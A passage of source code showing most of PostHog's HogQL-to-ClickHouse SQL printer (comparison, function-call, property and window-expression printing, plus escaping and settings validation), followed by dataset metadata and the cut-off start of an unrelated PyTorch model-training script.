{self._print_identifier(node.alias)}\")\n\n elif isinstance(node.type, ast.LazyTableType):\n if self.dialect == \"hogql\":\n join_strings.append(self._print_identifier(node.type.table.to_printed_hogql()))\n else:\n raise HogQLException(f\"Unexpected LazyTableType for: {node.type.table.to_printed_hogql()}\")\n else:\n raise HogQLException(\n f\"Only selecting from a table or a subquery is supported. Unexpected type: {node.type.__class__.__name__}\"\n )\n\n if node.table_final:\n join_strings.append(\"FINAL\")\n\n if node.sample is not None:\n sample_clause = self.visit_sample_expr(node.sample)\n if sample_clause is not None:\n join_strings.append(sample_clause)\n\n if node.constraint is not None:\n join_strings.append(f\"ON {self.visit(node.constraint)}\")\n\n return JoinExprResponse(printed_sql=\" \".join(join_strings), where=extra_where)\n\n def visit_join_constraint(self, node: ast.JoinConstraint):\n return self.visit(node.expr)\n\n def visit_arithmetic_operation(self, node: ast.ArithmeticOperation):\n if node.op == ast.ArithmeticOperationOp.Add:\n return f\"plus({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Sub:\n return f\"minus({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Mult:\n return f\"multiply({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Div:\n return f\"divide({self.visit(node.left)}, {self.visit(node.right)})\"\n elif node.op == ast.ArithmeticOperationOp.Mod:\n return f\"modulo({self.visit(node.left)}, {self.visit(node.right)})\"\n else:\n raise HogQLException(f\"Unknown ArithmeticOperationOp {node.op}\")\n\n def visit_and(self, node: ast.And):\n return f\"and({', '.join([self.visit(expr) for expr in node.exprs])})\"\n\n def visit_or(self, node: ast.Or):\n return f\"or({', '.join([self.visit(expr) for expr in node.exprs])})\"\n\n def visit_not(self, node: ast.Not):\n return f\"not({self.visit(node.expr)})\"\n\n def visit_tuple_access(self, node: ast.TupleAccess):\n visited_tuple = self.visit(node.tuple)\n visited_index = int(str(node.index))\n if isinstance(node.tuple, ast.Field):\n return f\"{visited_tuple}.{visited_index}\"\n\n return f\"({visited_tuple}).{visited_index}\"\n\n def visit_tuple(self, node: ast.Tuple):\n return f\"tuple({', '.join([self.visit(expr) for expr in node.exprs])})\"\n\n def visit_array_access(self, node: ast.ArrayAccess):\n return f\"{self.visit(node.array)}[{self.visit(node.property)}]\"\n\n def visit_array(self, node: ast.Array):\n return f\"[{', '.join([self.visit(expr) for expr in node.exprs])}]\"\n\n def visit_lambda(self, node: ast.Lambda):\n identifiers = [self._print_identifier(arg) for arg in node.args]\n if len(identifiers) == 0:\n raise ValueError(\"Lambdas require at least one argument\")\n elif len(identifiers) == 1:\n return f\"{identifiers[0]} -> {self.visit(node.expr)}\"\n return f\"({', '.join(identifiers)}) -> {self.visit(node.expr)}\"\n\n def visit_order_expr(self, node: ast.OrderExpr):\n return f\"{self.visit(node.expr)} {node.order}\"\n\n def visit_compare_operation(self, node: ast.CompareOperation):\n in_join_constraint = any(isinstance(item, ast.JoinConstraint) for item in self.stack)\n left = self.visit(node.left)\n right = self.visit(node.right)\n nullable_left = self._is_nullable(node.left)\n nullable_right = self._is_nullable(node.right)\n not_nullable = not nullable_left and not nullable_right\n\n # :HACK: until the new type system is out: https://github.com/PostHog/posthog/pull/17267\n # If we add a ifNull() around `events.timestamp`, we lose on the performance of the index.\n if (\"toTimeZone(\" in left and \".timestamp\" in left) or (\"toTimeZone(\" in right and \".timestamp\" in right):\n not_nullable = True\n\n constant_lambda = None\n value_if_one_side_is_null = False\n value_if_both_sides_are_null = False\n\n if node.op == ast.CompareOperationOp.Eq:\n op = f\"equals({left}, {right})\"\n constant_lambda = lambda left_op, right_op: left_op == right_op\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotEq:\n op = f\"notEquals({left}, {right})\"\n constant_lambda = lambda left_op, right_op: left_op != right_op\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.Like:\n op = f\"like({left}, {right})\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotLike:\n op = f\"notLike({left}, {right})\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.ILike:\n op = f\"ilike({left}, {right})\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotILike:\n op = f\"notILike({left}, {right})\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.In:\n op = f\"in({left}, {right})\"\n elif node.op == ast.CompareOperationOp.NotIn:\n op = f\"notIn({left}, {right})\"\n elif node.op == ast.CompareOperationOp.GlobalIn:\n op = f\"globalIn({left}, {right})\"\n elif node.op == ast.CompareOperationOp.GlobalNotIn:\n op = f\"globalNotIn({left}, {right})\"\n elif node.op == ast.CompareOperationOp.Regex:\n op = f\"match({left}, {right})\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotRegex:\n op = f\"not(match({left}, {right}))\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.IRegex:\n op = f\"match({left}, concat('(?i)', {right}))\"\n value_if_both_sides_are_null = True\n elif node.op == ast.CompareOperationOp.NotIRegex:\n op = f\"not(match({left}, concat('(?i)', {right})))\"\n value_if_one_side_is_null = True\n elif node.op == ast.CompareOperationOp.Gt:\n op = f\"greater({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op > right_op if left_op is not None and right_op is not None else False\n )\n elif node.op == ast.CompareOperationOp.GtEq:\n op = f\"greaterOrEquals({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op >= right_op if left_op is not None and right_op is not None else False\n )\n elif node.op == ast.CompareOperationOp.Lt:\n op = f\"less({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op < right_op if left_op is not None and right_op is not None else False\n )\n elif node.op == ast.CompareOperationOp.LtEq:\n op = f\"lessOrEquals({left}, {right})\"\n constant_lambda = (\n lambda left_op, right_op: left_op <= right_op if left_op is not None and right_op is not None else False\n )\n else:\n raise HogQLException(f\"Unknown CompareOperationOp: {node.op.name}\")\n\n # Try to see if we can take shortcuts\n\n # Can we compare constants?\n if isinstance(node.left, ast.Constant) and isinstance(node.right, ast.Constant) and constant_lambda is not None:\n return \"1\" if constant_lambda(node.left.value, node.right.value) else \"0\"\n\n # Special cases when we should not add any null checks\n if in_join_constraint or self.dialect == \"hogql\" or not_nullable:\n return op\n\n # Special optimization for \"Eq\" operator\n if (\n node.op == ast.CompareOperationOp.Eq\n or node.op == ast.CompareOperationOp.Like\n or node.op == ast.CompareOperationOp.ILike\n ):\n if isinstance(node.right, ast.Constant):\n if node.right.value is None:\n return f\"isNull({left})\"\n return f\"ifNull({op}, 0)\"\n elif isinstance(node.left, ast.Constant):\n if node.left.value is None:\n return f\"isNull({right})\"\n return f\"ifNull({op}, 0)\"\n return f\"ifNull({op}, isNull({left}) and isNull({right}))\" # Worse case performance, but accurate\n\n # Special optimization for \"NotEq\" operator\n if (\n node.op == ast.CompareOperationOp.NotEq\n or node.op == ast.CompareOperationOp.NotLike\n or node.op == ast.CompareOperationOp.NotILike\n ):\n if isinstance(node.right, ast.Constant):\n if node.right.value is None:\n return f\"isNotNull({left})\"\n return f\"ifNull({op}, 1)\"\n elif isinstance(node.left, ast.Constant):\n if node.left.value is None:\n return f\"isNotNull({right})\"\n return f\"ifNull({op}, 1)\"\n return f\"ifNull({op}, isNotNull({left}) or isNotNull({right}))\" # Worse case performance, but accurate\n\n # Return false if one, but only one of the two sides is a null constant\n if isinstance(node.right, ast.Constant) and node.right.value is None:\n # Both are a constant null\n if isinstance(node.left, ast.Constant) and node.left.value is None:\n return \"1\" if value_if_both_sides_are_null is True else \"0\"\n\n # Only the right side is null. Return a value only if the left side doesn't matter.\n if value_if_both_sides_are_null == value_if_one_side_is_null:\n return \"1\" if value_if_one_side_is_null is True else \"0\"\n elif isinstance(node.left, ast.Constant) and node.left.value is None:\n # Only the left side is null. Return a value only if the right side doesn't matter.\n if value_if_both_sides_are_null == value_if_one_side_is_null:\n return \"1\" if value_if_one_side_is_null is True else \"0\"\n\n # \"in\" and \"not in\" return 0/1 when the right operator is null, so optimize if the left operand is not nullable\n if node.op == ast.CompareOperationOp.In or node.op == ast.CompareOperationOp.NotIn:\n if not nullable_left or (isinstance(node.left, ast.Constant) and node.left.value is not None):\n return op\n\n # No constants, so check for nulls in SQL\n if value_if_one_side_is_null is True and value_if_both_sides_are_null is True:\n return f\"ifNull({op}, 1)\"\n elif value_if_one_side_is_null is True and value_if_both_sides_are_null is False:\n return f\"ifNull({op}, isNotNull({left}) or isNotNull({right}))\"\n elif value_if_one_side_is_null is False and value_if_both_sides_are_null is True:\n return f\"ifNull({op}, isNull({left}) and isNull({right}))\" # Worse case performance, but accurate\n elif value_if_one_side_is_null is False and value_if_both_sides_are_null is False:\n return f\"ifNull({op}, 0)\"\n else:\n raise HogQLException(\"Impossible\")\n\n def visit_constant(self, node: ast.Constant):\n if self.dialect == \"hogql\":\n # Inline everything in HogQL\n return self._print_escaped_string(node.value)\n elif (\n node.value is None\n or isinstance(node.value, bool)\n or isinstance(node.value, int)\n or isinstance(node.value, float)\n or isinstance(node.value, UUID)\n or isinstance(node.value, UUIDT)\n or isinstance(node.value, datetime)\n or isinstance(node.value, date)\n ):\n # Inline some permitted types in ClickHouse\n value = self._print_escaped_string(node.value)\n if \"%\" in value:\n # We don't know if this will be passed on as part of a legacy ClickHouse query or not.\n # Ban % to be on the safe side. Who knows how it can end up in a UUID or datetime for example.\n raise HogQLException(f\"Invalid character '%' in constant: {value}\")\n return value\n else:\n # Strings, lists, tuples, and any other random datatype printed in ClickHouse.\n return self.context.add_value(node.value)\n\n def visit_field(self, node: ast.Field):\n if node.type is None:\n field = \".\".join([self._print_hogql_identifier_or_index(identifier) for identifier in node.chain])\n raise HogQLException(f\"Field {field} has no type\")\n\n if self.dialect == \"hogql\":\n if node.chain == [\"*\"]:\n return \"*\"\n # When printing HogQL, we print the properties out as a chain as they are.\n return \".\".join([self._print_hogql_identifier_or_index(identifier) for identifier in node.chain])\n\n if node.type is not None:\n if isinstance(node.type, ast.LazyJoinType) or isinstance(node.type, ast.VirtualTableType):\n raise HogQLException(f\"Can't select a table when a column is expected: {'.'.join(node.chain)}\")\n\n return self.visit(node.type)\n else:\n raise HogQLException(f\"Unknown Type, can not print {type(node.type).__name__}\")\n\n def visit_call(self, node: ast.Call):\n if node.name in HOGQL_COMPARISON_MAPPING:\n op = HOGQL_COMPARISON_MAPPING[node.name]\n if len(node.args) != 2:\n raise HogQLException(f\"Comparison '{node.name}' requires exactly two arguments\")\n # We do \"cleverer\" logic with nullable types in visit_compare_operation\n return self.visit_compare_operation(\n ast.CompareOperation(\n left=node.args[0],\n right=node.args[1],\n op=op,\n )\n )\n elif node.name in HOGQL_AGGREGATIONS:\n func_meta = HOGQL_AGGREGATIONS[node.name]\n\n validate_function_args(\n node.args,\n func_meta.min_args,\n func_meta.max_args,\n node.name,\n function_term=\"aggregation\",\n )\n if func_meta.min_params:\n if node.params is None:\n raise HogQLException(f\"Aggregation '{node.name}' requires parameters in addition to arguments\")\n validate_function_args(\n node.params,\n func_meta.min_params,\n func_meta.max_params,\n node.name,\n function_term=\"aggregation\",\n argument_term=\"parameter\",\n )\n\n # check that we're not running inside another aggregate\n for stack_node in self.stack:\n if stack_node != node and isinstance(stack_node, ast.Call) and stack_node.name in HOGQL_AGGREGATIONS:\n raise HogQLException(\n f\"Aggregation '{node.name}' cannot be nested inside another aggregation '{stack_node.name}'.\"\n )\n\n args = [self.visit(arg) for arg in node.args]\n params = [self.visit(param) for param in node.params] if node.params is not None else None\n\n params_part = f\"({', '.join(params)})\" if params is not None else \"\"\n args_part = f\"({f'DISTINCT ' if node.distinct else ''}{', '.join(args)})\"\n return f\"{func_meta.clickhouse_name}{params_part}{args_part}\"\n\n elif node.name in HOGQL_CLICKHOUSE_FUNCTIONS:\n func_meta = HOGQL_CLICKHOUSE_FUNCTIONS[node.name]\n\n validate_function_args(node.args, func_meta.min_args, func_meta.max_args, node.name)\n if func_meta.min_params:\n if node.params is None:\n raise HogQLException(f\"Function '{node.name}' requires parameters in addition to arguments\")\n validate_function_args(\n node.params,\n func_meta.min_params,\n func_meta.max_params,\n node.name,\n argument_term=\"parameter\",\n )\n\n if self.dialect == \"clickhouse\":\n if node.name in FIRST_ARG_DATETIME_FUNCTIONS:\n args: List[str] = []\n for idx, arg in enumerate(node.args):\n if idx == 0:\n if isinstance(arg, ast.Call) and arg.name in ADD_OR_NULL_DATETIME_FUNCTIONS:\n args.append(f\"assumeNotNull(toDateTime({self.visit(arg)}))\")\n else:\n args.append(f\"toDateTime({self.visit(arg)}, 'UTC')\")\n else:\n args.append(self.visit(arg))\n elif node.name == \"concat\":\n args: List[str] = []\n for arg in node.args:\n if isinstance(arg, ast.Constant):\n if arg.value is None:\n args.append(\"''\")\n elif isinstance(arg.value, str):\n args.append(self.visit(arg))\n else:\n args.append(f\"toString({self.visit(arg)})\")\n elif isinstance(arg, ast.Call) and arg.name == \"toString\":\n if len(arg.args) == 1 and isinstance(arg.args[0], ast.Constant):\n if arg.args[0].value is None:\n args.append(\"''\")\n else:\n args.append(self.visit(arg))\n else:\n args.append(f\"ifNull({self.visit(arg)}, '')\")\n else:\n args.append(f\"ifNull(toString({self.visit(arg)}), '')\")\n else:\n args = [self.visit(arg) for arg in node.args]\n\n relevant_clickhouse_name = func_meta.clickhouse_name\n if func_meta.overloads:\n first_arg_constant_type = (\n node.args[0].type.resolve_constant_type()\n if len(node.args) > 0 and node.args[0].type is not None\n else None\n )\n\n if first_arg_constant_type is not None:\n for (\n overload_types,\n overload_clickhouse_name,\n ) in func_meta.overloads:\n if isinstance(first_arg_constant_type, overload_types):\n relevant_clickhouse_name = overload_clickhouse_name\n break # Found an overload matching the first function org\n\n if func_meta.tz_aware:\n if (relevant_clickhouse_name == \"now64\" and len(node.args) == 0) or (\n relevant_clickhouse_name == \"parseDateTime64BestEffortOrNull\" and len(node.args) == 1\n ):\n args.append(\"6\") # These two CH functions require the precision argument before timezone\n args.append(self.visit(ast.Constant(value=self._get_timezone())))\n if node.name == \"toStartOfWeek\" and len(node.args) == 1:\n # If week mode hasn't been specified, use the project's default.\n # For Monday-based weeks mode 3 is used (which is ISO 8601), for Sunday-based mode 0 (CH default)\n args.insert(1, WeekStartDay(self._get_week_start_day()).clickhouse_mode)\n\n params = [self.visit(param) for param in node.params] if node.params is not None else None\n\n params_part = f\"({', '.join(params)})\" if params is not None else \"\"\n args_part = f\"({', '.join(args)})\"\n return f\"{relevant_clickhouse_name}{params_part}{args_part}\"\n else:\n return f\"{node.name}({', '.join([self.visit(arg) for arg in node.args])})\"\n elif node.name in HOGQL_POSTHOG_FUNCTIONS:\n func_meta = HOGQL_POSTHOG_FUNCTIONS[node.name]\n validate_function_args(node.args, func_meta.min_args, func_meta.max_args, node.name)\n args = [self.visit(arg) for arg in node.args]\n\n if self.dialect in (\"hogql\", \"clickhouse\"):\n if node.name == \"hogql_lookupDomainType\":\n return f\"dictGetOrNull('channel_definition_dict', 'domain_type', (cutToFirstSignificantSubdomain(coalesce({args[0]}, '')), 'source'))\"\n elif node.name == \"hogql_lookupPaidDomainType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_paid', (cutToFirstSignificantSubdomain(coalesce({args[0]}, '')), 'source'))\"\n elif node.name == \"hogql_lookupPaidSourceType\":\n return (\n f\"dictGetOrNull('channel_definition_dict', 'type_if_paid', (coalesce({args[0]}, ''), 'source'))\"\n )\n elif node.name == \"hogql_lookupPaidMediumType\":\n return (\n f\"dictGetOrNull('channel_definition_dict', 'type_if_paid', (coalesce({args[0]}, ''), 'medium'))\"\n )\n elif node.name == \"hogql_lookupOrganicDomainType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_organic', (cutToFirstSignificantSubdomain(coalesce({args[0]}, '')), 'source'))\"\n elif node.name == \"hogql_lookupOrganicSourceType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_organic', (coalesce({args[0]}, ''), 'source'))\"\n elif node.name == \"hogql_lookupOrganicMediumType\":\n return f\"dictGetOrNull('channel_definition_dict', 'type_if_organic', (coalesce({args[0]}, ''), 'medium'))\"\n raise HogQLException(f\"Unexpected unresolved HogQL function '{node.name}(...)'\")\n else:\n close_matches = get_close_matches(node.name, ALL_EXPOSED_FUNCTION_NAMES, 1)\n if len(close_matches) > 0:\n raise HogQLException(\n f\"Unsupported function call '{node.name}(...)'. Perhaps you meant '{close_matches[0]}(...)'?\"\n )\n raise HogQLException(f\"Unsupported function call '{node.name}(...)'\")\n\n def visit_placeholder(self, node: ast.Placeholder):\n raise HogQLException(f\"Placeholders, such as {{{node.field}}}, are not supported in this context\")\n\n def visit_alias(self, node: ast.Alias):\n # Skip hidden aliases completely.\n if node.hidden:\n return self.visit(node.expr)\n expr = node.expr\n while isinstance(expr, ast.Alias) and expr.hidden:\n expr = expr.expr\n inside = self.visit(expr)\n if isinstance(expr, ast.Alias):\n inside = f\"({inside})\"\n alias = self._print_identifier(node.alias)\n return f\"{inside} AS {alias}\"\n\n def visit_table_type(self, type: ast.TableType):\n if self.dialect == \"clickhouse\":\n return type.table.to_printed_clickhouse(self.context)\n else:\n return type.table.to_printed_hogql()\n\n def visit_table_alias_type(self, type: ast.TableAliasType):\n return self._print_identifier(type.alias)\n\n def visit_lambda_argument_type(self, type: ast.LambdaArgumentType):\n return self._print_identifier(type.name)\n\n def visit_field_type(self, type: ast.FieldType):\n try:\n last_select = self._last_select()\n type_with_name_in_scope = lookup_field_by_name(last_select.type, type.name) if last_select else None\n except ResolverException:\n type_with_name_in_scope = None\n\n if (\n isinstance(type.table_type, ast.TableType)\n or isinstance(type.table_type, ast.TableAliasType)\n or isinstance(type.table_type, ast.VirtualTableType)\n ):\n resolved_field = type.resolve_database_field()\n if resolved_field is None:\n raise HogQLException(f'Can\\'t resolve field \"{type.name}\" on table.')\n if isinstance(resolved_field, Table):\n if isinstance(type.table_type, ast.VirtualTableType):\n return self.visit(ast.AsteriskType(table_type=ast.TableType(table=resolved_field)))\n else:\n return self.visit(\n ast.AsteriskType(\n table_type=ast.TableAliasType(\n table_type=ast.TableType(table=resolved_field),\n alias=type.table_type.alias,\n )\n )\n )\n\n # :KLUDGE: Legacy person properties handling. Only used within non-HogQL queries, such as insights.\n if (\n self.context.within_non_hogql_query\n and isinstance(type.table_type, ast.VirtualTableType)\n and type.name == \"properties\"\n and type.table_type.field == \"poe\"\n ):\n if self.context.modifiers.personsOnEventsMode != PersonOnEventsMode.DISABLED:\n field_sql = \"person_properties\"\n else:\n field_sql = \"person_props\"\n else:\n # this errors because resolved_field is of type ast.Alias and not a field - what's the best way to solve?\n field_sql = self._print_identifier(resolved_field.name)\n if self.context.within_non_hogql_query and type_with_name_in_scope == type:\n # Do not prepend table name in non-hogql context. We don't know what it actually is.\n return field_sql\n field_sql = f\"{self.visit(type.table_type)}.{field_sql}\"\n\n elif (\n isinstance(type.table_type, ast.SelectQueryType)\n or isinstance(type.table_type, ast.SelectQueryAliasType)\n or isinstance(type.table_type, ast.SelectUnionQueryType)\n ):\n field_sql = self._print_identifier(type.name)\n if isinstance(type.table_type, ast.SelectQueryAliasType):\n field_sql = f\"{self.visit(type.table_type)}.{field_sql}\"\n\n # :KLUDGE: Legacy person properties handling. Only used within non-HogQL queries, such as insights.\n if self.context.within_non_hogql_query and field_sql == \"events__pdi__person.properties\":\n if self.context.modifiers.personsOnEventsMode != PersonOnEventsMode.DISABLED:\n field_sql = \"person_properties\"\n else:\n field_sql = \"person_props\"\n\n else:\n error = f\"Can't access field '{type.name}' on a table with type '{type.table_type.__class__.__name__}'.\"\n if isinstance(type.table_type, ast.LazyJoinType):\n error += f\" Lazy joins should have all been replaced in the resolver.\"\n raise HogQLException(error)\n\n return field_sql\n\n def visit_property_type(self, type: ast.PropertyType):\n if type.joined_subquery is not None and type.joined_subquery_field_name is not None:\n return f\"{self._print_identifier(type.joined_subquery.alias)}.{self._print_identifier(type.joined_subquery_field_name)}\"\n\n field_type = type.field_type\n field = field_type.resolve_database_field()\n\n # check for a materialised column\n table = field_type.table_type\n while isinstance(table, ast.TableAliasType):\n table = table.table_type\n\n args: List[str] = []\n\n if self.context.modifiers.materializationMode != \"disabled\":\n # find a materialized property for the first part of the chain\n materialized_property_sql: Optional[str] = None\n if isinstance(table, ast.TableType):\n if self.dialect == \"clickhouse\":\n table_name = table.table.to_printed_clickhouse(self.context)\n else:\n table_name = table.table.to_printed_hogql()\n if field is None:\n raise HogQLException(f\"Can't resolve field {field_type.name} on table {table_name}\")\n field_name = cast(Union[Literal[\"properties\"], Literal[\"person_properties\"]], field.name)\n\n materialized_column = self._get_materialized_column(table_name, type.chain[0], field_name)\n if materialized_column:\n property_sql = self._print_identifier(materialized_column)\n property_sql = f\"{self.visit(field_type.table_type)}.{property_sql}\"\n materialized_property_sql = property_sql\n elif (\n self.context.within_non_hogql_query\n and (isinstance(table, ast.SelectQueryAliasType) and table.alias == \"events__pdi__person\")\n or (isinstance(table, ast.VirtualTableType) and table.field == \"poe\")\n ):\n # :KLUDGE: Legacy person properties handling. Only used within non-HogQL queries, such as insights.\n if self.context.modifiers.personsOnEventsMode != PersonOnEventsMode.DISABLED:\n materialized_column = self._get_materialized_column(\"events\", type.chain[0], \"person_properties\")\n else:\n materialized_column = self._get_materialized_column(\"person\", type.chain[0], \"properties\")\n if materialized_column:\n materialized_property_sql = self._print_identifier(materialized_column)\n\n if materialized_property_sql is not None:\n # TODO: rematerialize all columns to properly support empty strings and \"null\" string values.\n if self.context.modifiers.materializationMode == MaterializationMode.legacy_null_as_string:\n materialized_property_sql = f\"nullIf({materialized_property_sql}, '')\"\n else: # MaterializationMode.auto.legacy_null_as_null\n materialized_property_sql = f\"nullIf(nullIf({materialized_property_sql}, ''), 'null')\"\n\n if len(type.chain) == 1:\n return materialized_property_sql\n else:\n for name in type.chain[1:]:\n args.append(self.context.add_value(name))\n return self._unsafe_json_extract_trim_quotes(materialized_property_sql, args)\n\n for name in type.chain:\n args.append(self.context.add_value(name))\n return self._unsafe_json_extract_trim_quotes(self.visit(field_type), args)\n\n def visit_sample_expr(self, node: ast.SampleExpr):\n sample_value = self.visit_ratio_expr(node.sample_value)\n offset_clause = \"\"\n if node.offset_value:\n offset_value = self.visit_ratio_expr(node.offset_value)\n offset_clause = f\" OFFSET {offset_value}\"\n\n return f\"SAMPLE {sample_value}{offset_clause}\"\n\n def visit_ratio_expr(self, node: ast.RatioExpr):\n return self.visit(node.left) if node.right is None else f\"{self.visit(node.left)}/{self.visit(node.right)}\"\n\n def visit_select_query_alias_type(self, type: ast.SelectQueryAliasType):\n return self._print_identifier(type.alias)\n\n def visit_field_alias_type(self, type: ast.FieldAliasType):\n return self._print_identifier(type.alias)\n\n def visit_virtual_table_type(self, type: ast.VirtualTableType):\n return self.visit(type.table_type)\n\n def visit_asterisk_type(self, type: ast.AsteriskType):\n return \"*\"\n\n def visit_lazy_join_type(self, type: ast.LazyJoinType):\n raise HogQLException(\"Unexpected ast.LazyJoinType. Make sure LazyJoinResolver has run on the AST.\")\n\n def visit_lazy_table_type(self, type: ast.LazyJoinType):\n raise HogQLException(\"Unexpected ast.LazyTableType. Make sure LazyJoinResolver has run on the AST.\")\n\n def visit_field_traverser_type(self, type: ast.FieldTraverserType):\n raise HogQLException(\"Unexpected ast.FieldTraverserType. This should have been resolved.\")\n\n def visit_unknown(self, node: AST):\n raise HogQLException(f\"Unknown AST node {type(node).__name__}\")\n\n def visit_window_expr(self, node: ast.WindowExpr):\n strings: List[str] = []\n if node.partition_by is not None:\n if len(node.partition_by) == 0:\n raise HogQLException(\"PARTITION BY must have at least one argument\")\n strings.append(\"PARTITION BY\")\n for expr in node.partition_by:\n strings.append(self.visit(expr))\n\n if node.order_by is not None:\n if len(node.order_by) == 0:\n raise HogQLException(\"ORDER BY must have at least one argument\")\n strings.append(\"ORDER BY\")\n for expr in node.order_by:\n strings.append(self.visit(expr))\n\n if node.frame_method is not None:\n if node.frame_method == \"ROWS\":\n strings.append(\"ROWS\")\n elif node.frame_method == \"RANGE\":\n strings.append(\"RANGE\")\n else:\n raise HogQLException(f\"Invalid frame method {node.frame_method}\")\n if node.frame_start and node.frame_end is None:\n strings.append(self.visit(node.frame_start))\n\n elif node.frame_start is not None and node.frame_end is not None:\n strings.append(\"BETWEEN\")\n strings.append(self.visit(node.frame_start))\n strings.append(\"AND\")\n strings.append(self.visit(node.frame_end))\n\n else:\n raise HogQLException(\"Frame start and end must be specified together\")\n return \" \".join(strings)\n\n def visit_window_function(self, node: ast.WindowFunction):\n over = f\"({self.visit(node.over_expr)})\" if node.over_expr else self._print_identifier(node.over_identifier)\n return f\"{self._print_identifier(node.name)}({', '.join(self.visit(expr) for expr in node.args or [])}) OVER {over}\"\n\n def visit_window_frame_expr(self, node: ast.WindowFrameExpr):\n if node.frame_type == \"PRECEDING\":\n return f\"{int(str(node.frame_value)) if node.frame_value is not None else 'UNBOUNDED'} PRECEDING\"\n elif node.frame_type == \"FOLLOWING\":\n return f\"{int(str(node.frame_value)) if node.frame_value is not None else 'UNBOUNDED'} FOLLOWING\"\n elif node.frame_type == \"CURRENT ROW\":\n return \"CURRENT ROW\"\n else:\n raise HogQLException(f\"Invalid frame type {node.frame_type}\")\n\n def _last_select(self) -> Optional[ast.SelectQuery]:\n \"\"\"Find the last SELECT query in the stack.\"\"\"\n for node in reversed(self.stack):\n if isinstance(node, ast.SelectQuery):\n return node\n return None\n\n def _print_identifier(self, name: str) -> str:\n if self.dialect == \"clickhouse\":\n return escape_clickhouse_identifier(name)\n return escape_hogql_identifier(name)\n\n def _print_hogql_identifier_or_index(self, name: str | int) -> str:\n # Regular identifiers can't start with a number. Print digit strings as-is for unescaped tuple access.\n if isinstance(name, int) and str(name).isdigit():\n return str(name)\n return escape_hogql_identifier(name)\n\n def _print_escaped_string(self, name: float | int | str | list | tuple | datetime | date) -> str:\n if self.dialect == \"clickhouse\":\n return escape_clickhouse_string(name, timezone=self._get_timezone())\n return escape_hogql_string(name, timezone=self._get_timezone())\n\n def _unsafe_json_extract_trim_quotes(self, unsafe_field: str, unsafe_args: List[str]) -> str:\n return f\"replaceRegexpAll(nullIf(nullIf(JSONExtractRaw({', '.join([unsafe_field] + unsafe_args)}), ''), 'null'), '^\\\"|\\\"$', '')\"\n\n def _get_materialized_column(\n self, table_name: str, property_name: PropertyName, field_name: TableColumn\n ) -> Optional[str]:\n try:\n from ee.clickhouse.materialized_columns.columns import (\n TablesWithMaterializedColumns,\n get_materialized_columns,\n )\n\n materialized_columns = get_materialized_columns(cast(TablesWithMaterializedColumns, table_name))\n return materialized_columns.get((property_name, field_name), None)\n except ModuleNotFoundError:\n return None\n\n def _get_timezone(self) -> str:\n return self.context.database.get_timezone() if self.context.database else \"UTC\"\n\n def _get_week_start_day(self) -> WeekStartDay:\n return self.context.database.get_week_start_day() if self.context.database else WeekStartDay.SUNDAY\n\n def _is_nullable(self, node: ast.Expr) -> bool:\n if isinstance(node, ast.Constant):\n return node.value is None\n elif isinstance(node.type, ast.PropertyType):\n return True\n elif isinstance(node.type, ast.FieldType):\n return node.type.is_nullable()\n elif isinstance(node, ast.Alias):\n return self._is_nullable(node.expr)\n\n # we don't know if it's nullable, so we assume it can be\n return True\n\n def _print_settings(self, settings):\n pairs = []\n for key, value in settings:\n if value is None:\n continue\n if not isinstance(value, (int, float, str)):\n raise HogQLException(f\"Setting {key} must be a string, int, or float\")\n if not re.match(r\"^[a-zA-Z0-9_]+$\", key):\n raise HogQLException(f\"Setting {key} is not supported\")\n if isinstance(value, bool):\n pairs.append(f\"{key}={1 if value else 0}\")\n elif isinstance(value, int) or isinstance(value, float):\n pairs.append(f\"{key}={value}\")\n else:\n pairs.append(f\"{key}={self._print_escaped_string(value)}\")\n if len(pairs) > 0:\n return f\"SETTINGS {', '.join(pairs)}\"\n return None\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/printer.py","file_name":"printer.py","file_ext":"py","file_size_in_byte":57559,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"29354779717","text":"\n\nfrom __future__ import print_function\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport torch.optim as optimp\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nimport torch.optim.lr_scheduler as lr_scheduler\n\n\ndef train_model(model, dataloaders, criterion,learning_rate, num_epochs, is_inception=False):\n since = time.time()\n\n val_acc_history = []\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, betas=(0.9, 0.999), eps=1e-08, weight_decay=0, amsgrad=True)\n scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=5, verbose=True, threshold=0.0001, threshold_mode='rel', cooldown=0, min_lr=0, eps=1e-08)\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and valididation phase\n for phase in ['train', 'valid']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n # Get model outputs and calculate loss\n # Special case for inception because in training it has an auxiliary output. In train\n # mode we calculate the loss by summing the final output and the 